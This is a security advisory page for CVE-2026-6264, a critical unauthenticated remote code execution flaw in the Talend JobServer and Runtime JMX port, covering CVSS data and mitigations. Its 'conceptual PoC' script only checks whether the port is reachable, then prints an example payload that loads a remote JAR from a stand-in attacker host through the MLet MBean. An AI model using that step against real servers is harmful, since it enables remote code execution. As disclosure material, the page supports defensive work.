Security Vulnerability Report
CVE-2026-6264 CVSS 9.8 CRITICAL


Published: 2026-04-14 03:16:09
Last Modified: 2026-04-17 15:26:13
Source: 4ac701fe-44e9-4bcd-9585-dd6449257611

Description

A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data is available for this record. Affected products, as stated in the advisory:

Talend JobServer < R2024-07-RT
Talend Runtime < R2024-07-RT

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import socket

# Conceptual PoC for CVE-2026-6264
# This script demonstrates the logic of interacting with a vulnerable JMX service.
# Actual exploitation requires specific JMX/RMI libraries.


def check_jmx_vulnerability(target_ip, port):
    print(f"[*] Checking {target_ip}:{port} for CVE-2026-6264...")
    try:
        # Attempt to connect to the JMX port (usually RMI).
        # connect_ex only reports TCP reachability; an open port is not
        # proof that the service is unauthenticated or unpatched.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((target_ip, port))
        sock.close()
        if result == 0:
            print(f"[+] Port {port} is open. Potential vulnerability detected.")
            print("[!] Next step: Use JMX console or custom RMI client to invoke MBean operations without auth.")
            print("[!] Example Payload: Invoke MLet MBean to load http://attacker.com/exploit.jar")
        else:
            print(f"[-] Port {port} is closed.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python cve_2026_6264_poc.py <IP> <PORT>")
    else:
        check_jmx_vulnerability(sys.argv[1], int(sys.argv[2]))
```

References

https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fix-for-the-Qlik-Talend-JobServer-and-Talend/tac-p/2541974 (vendor advisory, source 4ac701fe-44e9-4bcd-9585-dd6449257611)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6264",
    "sourceIdentifier": "4ac701fe-44e9-4bcd-9585-dd6449257611",
    "published": "2026-04-14T03:16:09.050",
    "lastModified": "2026-04-17T15:26:13.013",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "4ac701fe-44e9-4bcd-9585-dd6449257611",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "references": [
      {
        "url": "https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fix-for-the-Qlik-Talend-JobServer-and-Talend/tac-p/2541974",
        "source": "4ac701fe-44e9-4bcd-9585-dd6449257611"
      }
    ]
  }
}
```